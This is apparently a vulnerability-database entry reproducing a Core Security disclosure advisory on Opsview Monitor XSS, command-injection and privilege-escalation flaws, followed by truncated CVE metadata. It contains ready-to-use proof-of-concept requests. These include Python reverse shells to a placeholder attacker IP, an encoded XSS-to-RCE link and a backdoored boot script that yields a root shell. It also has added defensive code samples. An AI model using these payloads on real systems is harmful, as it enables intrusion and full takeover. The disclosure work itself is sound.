VAR-201809-0905
Vulnerability from variot - Updated: 2023-12-18 12:01
The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. Opsview Monitor has a cross-site scripting vulnerability that allows an attacker to execute malicious JavaScript code in the context of a legitimate user.
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues.
. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1.
The following proof of concept demonstrates the vulnerability:
/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=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%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2.
The following proof of concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point out that this XSS is self-stored and is executed only in the context of the victim's session.
Excerpt of the source code showing the injected script tag:
/-----
[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/
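One way to close the sink shown in 7.2, as an added example that is not Opsview's code or part of the advisory: the object-type key is validated before storage and the stored state is escaped when it is written into an inline script. The function names, the `objectState` variable and the allowlist pattern are assumptions; the sample state is constructed from the excerpt above.

```python
import json
import re
from html.parser import HTMLParser

# Assumption: object-type names ("profile", "netflow_collector", ...) are
# lowercase identifiers, so anything else is rejected before it is stored.
OBJECT_TYPE_RE = re.compile(r"[a-z][a-z0-9_]{0,63}")

PREFIX = "var objectState = "  # hypothetical variable name for the inline state


def is_valid_object_type(name):
    """Input-side check for the first element of the 'data' array."""
    return isinstance(name, str) and OBJECT_TYPE_RE.fullmatch(name) is not None


def json_for_script(value):
    """Serialize so the text cannot terminate the enclosing <script> element.

    JSON only allows <, > and & inside strings, where \\uXXXX escapes are
    legal, so the result still parses to the same value. json.dumps with the
    default ensure_ascii=True already escapes U+2028 and U+2029.
    """
    text = json.dumps(value)
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


def render_naive(state):
    """The pattern behind the excerpt: raw JSON inside an inline script."""
    return "<script>" + PREFIX + json.dumps(state) + ";</script>"


def render_escaped(state):
    """Output-side fix: same page fragment, escaped serialization."""
    return "<script>" + PREFIX + json_for_script(state) + ";</script>"


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the way an HTML tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.script_starts = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_starts += 1

    def handle_data(self, data):
        self.chunks.append(data)


def parse_fragment(html):
    """Return (number of script elements opened, concatenated text data)."""
    parser = ScriptCounter()
    parser.feed(html)
    parser.close()
    return parser.script_starts, "".join(parser.chunks)


def recovered_state(html):
    """Parse the inline state back out of a fragment with one script element."""
    _, body = parse_fragment(html)
    return json.loads(body[len(PREFIX):].rstrip(";"))


# Constructed sample: one legitimate key and the key stored by the request above.
STORE = {"storeState": {"sorters": [], "filters": [], "pageSize": 50, "page": 1}}
SAMPLE_STATE = {"profile": STORE, "</script><script>alert(4)</script>": STORE}

if __name__ == "__main__":
    print("naive  :", parse_fragment(render_naive(SAMPLE_STATE))[0], "script elements")
    print("escaped:", parse_fragment(render_escaped(SAMPLE_STATE))[0], "script element")
    for key in SAMPLE_STATE:
        print(repr(key), "accepted" if is_valid_object_type(key) else "rejected")
```

Either control alone stops this payload; applying both keeps previously stored bad keys from executing after the input check is deployed.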
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=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%3D%3D
Connection: close

{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=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%3D%3D
Connection: close

ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
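The flaw class behind 7.3 and 7.4, as an added example that is not Opsview's code or part of the advisory: a request value pasted into a shell command line, next to a version that passes it as a single argv element, an allowlist check, and a way to keep a password off the command line entirely. The handler scripts, function names and allowlist pattern are assumptions, and the sample value is constructed with a harmless echo marker.

```python
import re
import shlex
import subprocess
import sys

# Stand-ins for the notification / connection-test helpers (hypothetical):
# the first prints the one argument it received, the second reads a secret
# from stdin and prints only its length.
HANDLER = "import sys; print(sys.argv[1])"
HANDLER_STDIN = "import sys; print(len(sys.stdin.read()))"

# Assumption: a pager or username value is a short token of these characters
# and never starts with '-', so it cannot be mistaken for an option.
VALUE_RE = re.compile(r"[A-Za-z0-9@._+][A-Za-z0-9@._+-]{0,127}")


def is_acceptable(value):
    """Allowlist check applied before the value reaches any command."""
    return isinstance(value, str) and VALUE_RE.fullmatch(value) is not None


def run_via_shell(value):
    """Anti-pattern: the value becomes part of text that /bin/sh parses."""
    cmd = f"{shlex.quote(sys.executable)} -c {shlex.quote(HANDLER)} {value}"
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout


def run_without_shell(value):
    """No shell involved: the value is exactly one argv element."""
    argv = [sys.executable, "-c", HANDLER, value]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout


def run_with_secret_on_stdin(secret):
    """Passwords go over stdin, so they are neither parsed nor visible in ps."""
    argv = [sys.executable, "-c", HANDLER_STDIN]
    done = subprocess.run(argv, input=secret, capture_output=True,
                          text=True, check=True)
    return done.stdout.strip()


# Constructed sample value: a separator followed by a harmless marker command.
SAMPLE = "123123123; echo INJECTED"

if __name__ == "__main__":
    print("shell    :", run_via_shell(SAMPLE).splitlines())
    print("argv     :", run_without_shell(SAMPLE).splitlines())
    print("allowlist:", is_acceptable("123123123"), is_acceptable(SAMPLE))
    print("stdin len:", run_with_secret_on_stdin(SAMPLE))
```

With the shell variant the marker command runs as a second command; with the argv variant the whole string arrives as data, and the allowlist rejects it before either call.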
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time impersonate the nagios user during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver

test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
    case "$1" in
        db_export)
            db_export
            ;;
        db_export_test)
            db_export_test
            ;;
        db_export_initial)
            TEST=1
            db_backup
            ;;
        db_import)
            db_import
            ;;
        db_install)
            db_install
            ;;
        db_backup)
            db_backup
            ;;
        db_restore)
            db_restore
            ;;
        db_exists)
            python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
            db_exists
            exit $?
            ;;
        db_upgrade)
            db_upgrade
            exit $?
            ;;
        *)
            die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}"
            ;;
    esac
    shift
done
-----/
/-----
$ nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root)
-----/
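A check for the condition described in 7.5, as an added example that is not part of the advisory or of Opsview's tooling: it lists the files a root-run init script references and reports any that a non-root account could modify. The function names and the comment-stripping heuristic are assumptions; the script text is the excerpt above and the uid 1001 used in the self-check is constructed.

```python
import os
import re
import stat

# Absolute paths as they appear in shell text; '$' before '/' is excluded so
# that "$DIR/file" is not mistaken for "/file".
ABS_PATH_RE = re.compile(r"(?<![\w$])/(?:[\w.+-]+/)*[\w.+-]+")

# The init script excerpt quoted in the advisory.
INIT_EXCERPT = r'''
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
'''


def referenced_paths(script_text):
    """Absolute paths on non-comment text, in first-seen order.

    Heuristic: everything after the first '#' on a line is treated as a
    comment, which is good enough for init scripts like the one above.
    """
    seen = []
    for line in script_text.splitlines():
        code = line.split("#", 1)[0]
        for path in ABS_PATH_RE.findall(code):
            if path not in seen:
                seen.append(path)
    return seen


def mode_findings(mode, uid):
    """Reasons why a file run by root could be changed by someone else."""
    findings = []
    if uid != 0:
        findings.append("owner is not root")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit(script_path):
    """Map each regular file the script references to its findings.

    The parent directory is checked too, because write access there allows
    the file to be replaced even when the file itself is read-only.
    """
    with open(script_path, encoding="utf-8", errors="replace") as handle:
        text = handle.read()
    report = {}
    for path in referenced_paths(text):
        if not os.path.isfile(path):
            continue  # skips /dev/null and paths missing on this host
        st = os.stat(path)
        found = mode_findings(st.st_mode, st.st_uid)
        parent = os.stat(os.path.dirname(path))
        found += ["parent directory: " + item
                  for item in mode_findings(parent.st_mode, parent.st_uid)]
        if found:
            report[path] = found
    return report


if __name__ == "__main__":
    print(referenced_paths(INIT_EXCERPT))
    # -rwxrwxr-x owned by a non-root account, as in the ls output above
    print(mode_findings(0o100775, 1001))
    init_dir = "/etc/init.d"
    if os.path.isdir(init_dir):
        for name in sorted(os.listdir(init_dir)):
            full = os.path.join(init_dir, name)
            if os.path.isfile(full):
                for path, found in audit(full).items():
                    print(f"{full}: {path}: {', '.join(found)}")
```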
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes for their earlier product versions and they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th.
2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0905",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16147"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16147",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-16147",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
